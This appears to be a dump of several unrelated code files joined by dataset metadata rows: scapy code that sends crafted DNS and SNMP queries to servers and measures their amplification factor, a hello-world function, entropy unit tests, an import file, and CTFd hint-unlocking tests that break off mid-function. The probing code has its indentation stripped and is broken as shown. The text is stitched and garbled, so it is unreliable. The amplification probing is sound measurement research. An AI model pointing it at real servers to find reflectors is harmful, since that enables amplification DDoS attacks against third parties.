print("oid list: ", oid_lst)
pdutype = SNMPbulk(id= id, non_repeaters = non_repeaters, max_repetitions=max_repetitions, \
varbindlist= oid_lst )
snmppacket = SNMP(version=version, community=community, PDU=pdutype)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=161)/snmppacket
packets = []
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# SNMP_Next / SNMP_Get
def __snmpstandard_dict(self, serverip, field_dict , SNMPftn):
version = field_dict["version"]
community = field_dict["community"]
id = field_dict["id"]
error = field_dict["error"]
error_index = field_dict["error_index"]
varbind_oid = field_dict["varbind_oid"]
varbind_multiple = field_dict["varbind_multiple"]
oid_lst = [SNMPvarbind( oid=ASN1_OID( varbind_oid ) )] * varbind_multiple
pdutype = SNMPftn(id= id, error = error, error_index = error_index, varbindlist= oid_lst )
snmppacket = SNMP(version=version, community=community, PDU=pdutype)
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=161)/snmppacket
packets = []
packets.append(request)
res, unans = sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
for x in res:
packets.append(x[1])
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
# DNS: without EDNS field
def __dns_message_noedns_dict(self, serverip, field_vals):
try:
packets = []
print("IN NOEDNS section")
id = field_vals["id"]
qr = field_vals["qr"]
aa = field_vals["aa"]
tc = field_vals["tc"]
rd = field_vals["rd"]
ra = field_vals["ra"]
cd = field_vals["cd"]
ad = field_vals["ad"]
opcode = field_vals["opcode"]
rcode = field_vals["rcode"]
url = field_vals["url"]
rdataclass = field_vals["rdataclass"]
rdatatype = field_vals["rdatatype"]
m = dns.message.Message()
m.id = id
if qr:
m.flags |= int(dns.flags.QR)
if aa:
m.flags |= int(dns.flags.AA)
if tc:
m.flags |= int(dns.flags.TC)
if rd:
m.flags |= int(dns.flags.RD)
if ra:
m.flags |= int(dns.flags.RA )
if ad:
m.flags |= int(dns.flags.AD )
if cd:
m.flags |= int(dns.flags.CD )
m.set_opcode(int(opcode))
m.set_rcode(int(rcode))
qname = dns.name.from_text(url)
m.find_rrset(m.question, qname , rdataclass , rdatatype , create=True, force_unique=True)
data = m.to_wire()
request = IP(dst=serverip)/UDP(sport=random.randint(5000,65535),dport=53)/Raw(load=data)
print("request ", request)
packets.append(request)
###################### write to pcap then read ##################
# NOTE: to parse the DNS request correctly with scapy, we first write the
# request to a pcap and then read it back, which forces the packet to be
# re-serialised in the correct wire format (see the stand-alone sketch
# after this method)
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap_temp/"+serverip):
os.makedirs("/ampmap/pcap_temp/"+serverip)
temp_pcap_filename = "/ampmap/pcap_temp/"+serverip+"/temp.pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
else:
if not os.path.exists("out/pcap_temp/"+serverip):
os.makedirs("out/pcap_temp/"+serverip)
temp_pcap_filename = "out/pcap_temp/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
#################################################################
res, unans= sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
# pcap dump...
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
except dns.exception.DNSException:
return 0
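# --- illustrative sketch of the write-then-read trick noted above
# (hypothetical helper; wrpcap/rdpcap come from the scapy import at the
# top of the file) --- Serialising a crafted packet to a pcap and reading
# it back forces scapy to re-parse the raw bytes, so lengths, checksums
# and layer bindings match what is actually sent on the wire.
def reparse_via_pcap(pkt, tmp_path="/tmp/_reparse.pcap"):
    wrpcap(tmp_path, [pkt])       # serialise to wire format
    return rdpcap(tmp_path)[0]    # re-parse from the raw bytes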
# DNS
def __dns_message_dict(self, serverip, field_vals):
try:
packets = []
m = dns.message.Message()
id = field_vals["id"]
qr = field_vals["qr"]
aa = field_vals["aa"]
tc = field_vals["tc"]
rd = field_vals["rd"]
ra = field_vals["ra"]
cd = field_vals["cd"]
ad = field_vals["ad"]
opcode = field_vals["opcode"]
rcode = field_vals["rcode"]
edns = field_vals["edns"]
payload = field_vals["payload"]
url = field_vals["url"]
rdataclass = field_vals["rdataclass"]
rdatatype = field_vals["rdatatype"]
dnssec = field_vals["dnssec"]
m.id = id
if qr:
m.flags |= int(dns.flags.QR)
if aa:
m.flags |= int(dns.flags.AA)
if tc:
m.flags |= int(dns.flags.TC)
if rd:
m.flags |= int(dns.flags.RD)
if ra:
m.flags |= int(dns.flags.RA )
if ad:
m.flags |= int(dns.flags.AD )
if cd:
m.flags |= int(dns.flags.CD )
m.set_opcode(int(opcode))
m.set_rcode(int(rcode))
m.edns = int(edns)
m.payload=int(payload)
if dnssec:
m.ednsflags |= int( dns.flags.DO)
qname = dns.name.from_text(url)
m.find_rrset(m.question, qname , rdataclass , rdatatype , create=True,
force_unique=True)
data = m.to_wire()
request = IP( dst=serverip)/UDP(sport=random.randint(5000,65535),dport=53)/Raw(load=data)
#print("request ", request)
packets.append(request)
###################### write to pcap then read ##################
# NOTE: as above, write the request to a pcap and read it back so that
# scapy re-serialises it into the correct wire format
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap_temp/"+serverip):
os.makedirs("/ampmap/pcap_temp/"+serverip)
temp_pcap_filename = "/ampmap/pcap_temp/"+serverip+"/temp.pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
else:
if not os.path.exists("out/pcap_temp/"+serverip):
os.makedirs("out/pcap_temp/"+serverip)
temp_pcap_filename = "out/pcap_temp/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
wrpcap(temp_pcap_filename, packets)
request = rdpcap(temp_pcap_filename)[0]
#################################################################
res, unans= sr(request, multi=True, timeout=self.timeout, verbose=0)
if res is not None:
for x in res:
packets.append(x[1])
resplen = sum([len(x[1]) for x in res])
print("AF: ", float(resplen)/float(len(request)))
# pcap dump...
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return float(resplen)/float(len(request))
else:
print("AF: ", 0)
print()
if PCAP_TO_LOCAL_DISK == True:
if not os.path.exists("/ampmap/pcap/"+serverip):
os.makedirs("/ampmap/pcap/"+serverip)
pcap_filename = "/ampmap/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
else:
if not os.path.exists("out/pcap/"+serverip):
os.makedirs("out/pcap/"+serverip)
pcap_filename = "out/pcap/"+serverip+"/"+self.phase+"_"+str(self.query_cnt_dict[self.phase])+".pcap"
self.query_cnt_dict[self.phase] += 1
wrpcap(pcap_filename, packets)
return 0
except dns.exception.DNSException:
return 0
# Given the protocol, server ip and query fields, send the query and return the amplification factor (AF)
def get_af_dict(self, serverip, field_dict):
if self.proto.lower() == "dns":
if "edns" in field_dict:
return self.__dns_message_dict( serverip, field_dict )
else:
return self.__dns_message_noedns_dict(serverip, field_dict )
elif self.proto.lower() == "memcached":
return self.__memcached_dict( serverip, field_dict)
elif self.proto.lower() =='chargen' :
return self.__chargen_dict( serverip, field_dict)
elif self.proto.lower() == "ntp":
return self.__ntp_dict(serverip, field_dict )
elif self.proto.lower() == "ssdp":
return self.__ssdp_dict(serverip, field_dict)
elif self.proto.lower() == "quake":
return self.__quake_dict(serverip, field_dict)
elif self.proto.lower() == "snmpbulk":
return self.__snmpbulk_dict(serverip, field_dict)
elif self.proto.lower() == "snmpnext":
return self.__snmpstandard_dict(serverip, field_dict, SNMPnext)
elif self.proto.lower() == "snmpget":
return self.__snmpstandard_dict(serverip, field_dict, SNMPget)
else:
raise ValueError("Protocol is not supported ")
def get_af(self, serverip, field_name, field_values):
assert(len(field_name) == len(field_values))
field_dict = OrderedDict(zip(field_name, field_values))
return self.get_af_dict( serverip, field_dict )
def register_protocol(self,proto):
self.proto = proto
def register_phase(self, phase):
self.phase = phase
self.query_cnt_dict[phase] = 1
def blackbox(timeout):
return BlackBox(timeout)
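# --- illustrative usage sketch (hypothetical values; sending packets with
# scapy's sr() typically requires root privileges, and 192.0.2.1 is a
# TEST-NET placeholder address, not a real server) ---
def demo_blackbox():
    bb = blackbox(timeout=2)
    bb.register_protocol("chargen")   # selects __chargen_dict in get_af_dict
    bb.register_phase("probe")        # initialises the per-phase pcap counter
    # field names and values are zipped into an OrderedDict by get_af
    af = bb.get_af("192.0.2.1", ["character", "length"], ["A", 10])
    print("amplification factor:", af)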
| 35.403371
| 126
| 0.529531
| 3,591
| 31,509
| 4.482317
| 0.074074
| 0.064302
| 0.05666
| 0.075547
| 0.807903
| 0.794421
| 0.794421
| 0.782617
| 0.761059
| 0.755281
| 0
| 0.011036
| 0.332826
| 31,509
| 889
| 127
| 35.443195
| 0.754638
| 0.026913
| 0
| 0.764007
| 0
| 0
| 0.084234
| 0.00106
| 0
| 0
| 0
| 0
| 0.001698
| 1
| 0.027165
| false
| 0
| 0.018676
| 0.001698
| 0.103565
| 0.071307
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37dffbe983de890f78aaa6dfb1e5607c4a6fd623
| 49
|
py
|
Python
|
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | null | null | null |
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | 19
|
2019-07-20T23:29:27.000Z
|
2022-01-19T21:38:49.000Z
|
python/hello-world/hello_world.py
|
gdantaas/Exercism-Python
|
3a11f5010a1f740b73be458d9802ec074d6569a0
|
[
"MIT"
] | null | null | null |
def hello():
return 'Hello, World!'
| 12.25
| 26
| 0.571429
| 6
| 49
| 4.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 49
| 3
| 27
| 16.333333
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.265306
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
72890f72f42bf1f0ef57d830423fe9b03e4412e5
| 6,624
|
py
|
Python
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 3
|
2021-05-19T11:44:30.000Z
|
2022-03-30T07:13:49.000Z
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 2
|
2021-06-02T01:24:59.000Z
|
2021-06-02T12:20:31.000Z
|
tests/quara/math/test_entropy.py
|
tknrsgym/quara
|
8f3337af83cdd02bb85632bb1e297902b1fff8fb
|
[
"Apache-2.0"
] | 1
|
2021-10-14T13:21:27.000Z
|
2021-10-14T13:21:27.000Z
|
import numpy as np
import numpy.testing as npt
import pytest
from quara.math import entropy
def test_round_varz():
# success
actual = entropy.round_varz(0.1, 0.0)
expected = 0.1
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(np.float64(0.1), np.float64(0.0))
expected = 0.1
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(0.5, 0.8)
expected = 0.8
npt.assert_almost_equal(actual, expected, decimal=15)
actual = entropy.round_varz(np.float64(0.5), np.float64(0.8))
expected = 0.8
npt.assert_almost_equal(actual, expected, decimal=15)
# raise ValueError
with pytest.raises(ValueError):
entropy.round_varz(-0.1, 0.0)
with pytest.raises(ValueError):
entropy.round_varz(0.5, -0.8)
with pytest.raises(ValueError):
entropy.round_varz(0.5, 0.8j)
def test_relative_entropy():
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p)
expected = 2 ** 4 * np.log(2) + 3 ** 2 * np.log(3)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_q=8.5)
expected = 3 ** 2 * np.log(3)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_p=4)
expected = 2 ** 3 * np.log(4) + 3 ** 2 * np.log(4)
npt.assert_almost_equal(actual, expected, decimal=15)
# q/p < eps_p
q = np.array([2 ** 3, 3], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
actual = entropy.relative_entropy(q, p, eps_p=2)
expected = 2 ** 3 * np.log(4) + 3 * np.log(2)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([-2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p)
# eps_p is negative
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p, eps_p=-1)
# eps_q is negative
q = np.array([2 ** 3, 3 ** 2], dtype=np.float64)
p = np.array([2, 3], dtype=np.float64)
with pytest.raises(ValueError):
entropy.relative_entropy(q, p, eps_q=-1)
def test_gradient_relative_entropy_2nd():
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p)
expected = np.array([-22, -32], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_q=1.5)
expected = np.array([-18, -24], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
actual = entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_p=4)
expected = np.array([-21, -30], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([1, 2], dtype=np.float64)
p = np.array([-3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
with pytest.raises(ValueError):
entropy.gradient_relative_entropy_2nd(q, p, grad_p)
# eps_p is negative
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
with pytest.raises(ValueError):
entropy.gradient_relative_entropy_2nd(q, p, grad_p, eps_p=-1)
def test_hessian_relative_entropy_2nd():
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p)
expected = np.array([[144, 204], [194, 288]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# q < eps_q
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_q=1.5)
expected = np.array([[132, 180], [174, 240]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p < eps_p
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
actual = entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_p=4)
expected = np.array([[138, 192], [183, 264]], dtype=np.float64)
npt.assert_almost_equal(actual, expected, decimal=15)
# p has negative entry
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, -4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
with pytest.raises(ValueError):
entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p)
# eps_p is negative
q = np.array([1, 2], dtype=np.float64)
p = np.array([3, 4], dtype=np.float64)
grad_p = np.array([[12, 24], [36, 48]], dtype=np.float64)
hess_p = [
np.array([[12, 24], [36, 48]], dtype=np.float64),
np.array([[60, 72], [84, 96]], dtype=np.float64),
]
with pytest.raises(ValueError):
entropy.hessian_relative_entropy_2nd(q, p, grad_p, hess_p, eps_p=-1)
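# --- illustrative sketch (assumption: entropy.relative_entropy computes
# the unnormalised KL divergence sum(q * log(q / p))) --- The expected
# values above follow from that definition; for the first case,
# q = [8, 9], p = [2, 3]:
#   8*log(8/2) + 9*log(9/3) = 8*log(4) + 9*log(3) = 2**4*log(2) + 3**2*log(3)
def demo_expected_value():
    import numpy as np
    q, p = np.array([8.0, 9.0]), np.array([2.0, 3.0])
    return float(np.sum(q * np.log(q / p)))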
| 36.8
| 82
| 0.616244
| 1,082
| 6,624
| 3.64695
| 0.071165
| 0.145971
| 0.212874
| 0.064622
| 0.92448
| 0.918905
| 0.918905
| 0.89559
| 0.87557
| 0.860365
| 0
| 0.100019
| 0.204559
| 6,624
| 179
| 83
| 37.005587
| 0.64889
| 0.034873
| 0
| 0.619403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104478
| 1
| 0.029851
| false
| 0
| 0.029851
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72d4e1616dcc0320bba247172029d914a2862f37
| 121
|
py
|
Python
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 12
|
2020-12-13T15:48:15.000Z
|
2022-03-20T14:12:25.000Z
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 5
|
2020-11-01T15:42:06.000Z
|
2021-12-22T17:24:04.000Z
|
utils/__init__.py
|
PIVASIA/Storm_detection
|
2a1af68e6c5e76520af06938555c2bb709157740
|
[
"MIT"
] | 7
|
2020-12-27T09:28:31.000Z
|
2021-11-03T03:52:54.000Z
|
from .detection_utils import collate_fn
from .detection_utils import visualize_boxes_and_labels_on_image_array, load_obj
| 40.333333
| 80
| 0.900826
| 19
| 121
| 5.210526
| 0.789474
| 0.262626
| 0.363636
| 0.484848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 121
| 2
| 81
| 60.5
| 0.883929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72ff1c1dffef54064ad9e0fac00995f5dc6f72ee
| 8,833
|
py
|
Python
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 7
|
2019-10-10T10:06:38.000Z
|
2021-02-13T05:07:34.000Z
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 55
|
2020-08-05T08:23:50.000Z
|
2021-07-27T06:20:09.000Z
|
tests/users/test_hints.py
|
atti1a/CTFd
|
6c5c63d667a17aec159c8e26ea53dccfbc4d0fa3
|
[
"Apache-2.0"
] | 13
|
2020-05-08T18:52:54.000Z
|
2022-01-02T11:19:07.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from CTFd.models import db, Unlocks, Users
from CTFd.utils import set_config, text_type
from tests.helpers import (
create_ctfd,
destroy_ctfd,
register_user,
login_as_user,
gen_challenge,
gen_award,
gen_flag,
gen_hint,
)
from freezegun import freeze_time
def test_user_cannot_unlock_hint():
"""Test that a user can't unlock a hint if they don't have enough points"""
app = create_ctfd()
with app.app_context():
with app.test_client():
register_user(app, name="user1", email="user1@ctfd.io")
chal = gen_challenge(app.db, value=100)
chal_id = chal.id
gen_flag(app.db, challenge_id=chal.id, content="flag")
hint = gen_hint(db, chal_id, cost=10)
hint_id = hint.id
client = login_as_user(app, name="user1", password="password")
with client.session_transaction():
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") is None
assert resp["data"].get("cost") == 10
destroy_ctfd(app)
def test_user_can_unlock_hint():
"""Test that a user can unlock a hint if they have enough points"""
app = create_ctfd()
with app.app_context():
with app.test_client():
register_user(app, name="user1", email="user1@ctfd.io")
chal = gen_challenge(app.db, value=100)
chal_id = chal.id
gen_flag(app.db, challenge_id=chal.id, content="flag")
hint = gen_hint(app.db, chal_id, cost=10)
hint_id = hint.id
gen_award(app.db, user_id=2, value=15)
client = login_as_user(app, name="user1", password="password")
user = Users.query.filter_by(name="user1").first()
assert user.score == 15
with client.session_transaction():
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") is None
params = {"target": hint_id, "type": "hints"}
r = client.post("/api/v1/unlocks", json=params)
resp = r.get_json()
assert resp["success"] is True
r = client.get("/api/v1/hints/{}".format(hint_id))
resp = r.get_json()
assert resp["data"].get("content") == "This is a hint"
user = Users.query.filter_by(name="user1").first()
assert user.score == 5
destroy_ctfd(app)
def test_unlocking_hints_with_no_cost():
"""Test that hints with no cost can be unlocked"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ctf_with_points():
"""Test that hints with a cost are unlocked if you have the points"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") == "This is a hint"
user = Users.query.filter_by(id=2).first()
assert user.score == 90
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ctf_without_points():
"""Test that hints with a cost are not unlocked if you don't have the points"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert (
r.get_json()["errors"]["score"]
== "You do not have enough points to unlock this hint"
)
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
user = Users.query.filter_by(id=2).first()
assert user.score == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_before_ctf():
"""Test that hints are not unlocked if the CTF hasn't begun"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id)
gen_award(app.db, user_id=2)
